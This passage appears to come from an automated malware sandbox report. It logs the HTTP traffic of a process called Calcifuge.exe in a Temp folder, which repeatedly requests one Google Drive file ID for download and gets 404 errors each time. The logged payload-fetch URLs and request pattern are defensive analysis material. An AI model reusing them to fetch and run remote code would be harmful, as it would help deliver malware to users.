                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:52:33 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 65 33 48 79 46 6d 6d 51 54 32 59 37 67 74 2d 73 34 6f 4c 75 6a 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="e3HyFmmQT2Y7gt-s4oLujQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              4192.168.2.453460172.217.16.2064437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:52:34 UTC428OUTGET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:52:35 UTC1920INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:52:35 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: script-src 'nonce-A_OOQar8YrAtKffhKr9fFQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              5192.168.2.453461172.217.16.1294437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:52:35 UTC470OUTGET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:52:36 UTC1844INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgTbs1P9oRgujbOEyJ3yx0iW3l913ZP37ugmvoLSTeUuYUTdGSfrEsqF5tVok1XkqdRP
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:52:36 GMT
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: script-src 'nonce-W0pOL_5HAhjlq32MQY2aFw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:52:36 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 37 49 68 45 47 6b 7a 41 49 59 6e 31 6e 49 31 45 46 6c 78 70 58 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="7IhEGkzAIYn1nI1EFlxpXw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              6192.168.2.453462172.217.16.2064437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:52:37 UTC428OUTGET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:52:37 UTC1920INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:52:37 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-hN755_qBlwwpxz50qoz6Gw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              7192.168.2.453463172.217.16.1294437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:52:38 UTC470OUTGET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:52:38 UTC1851INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgSGhacbtpB3ODSnNKll6IKbOlCgw_V5bboHw9rAYJI8PoOsLEy-fe6Yc6vZXFZTJK9HNYyDZ40
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:52:38 GMT
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-woyzqQFrcQnuiPGGGptLZQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:52:38 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 42 6c 56 6b 6c 78 46 45 69 6a 70 75 71 53 48 37 5a 4f 44 79 44 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="BlVklxFEijpuqSH7ZODyDQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              8192.168.2.453464172.217.16.2064437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:52:39 UTC428OUTGET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:52:39 UTC1920INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:52:39 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Security-Policy: script-src 'nonce-OWLEpDK-44HcNSCEithxPw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              9192.168.2.453465172.217.16.1294437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:52:40 UTC470OUTGET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:52:40 UTC1844INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC6KCOiy9RgdqzvIzD9vNkapPiokd7Z8kQibYYOHk8djs0BqkkEy46z0qDNanPr4DWBU
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:52:40 GMT
                                                                                              Content-Security-Policy: script-src 'nonce-y1hjgZyHL2DExuSUYHqAzg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:52:40 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 64 4d 34 33 54 66 5a 34 4d 66 38 47 4c 59 79 53 78 47 68 4a 66 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="dM43TfZ4Mf8GLYySxGhJfg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              10192.168.2.453466172.217.16.2064437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:52:41 UTC428OUTGET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:52:42 UTC1920INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:52:41 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-pHbeLvjkx3tC1toP_9Qifw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
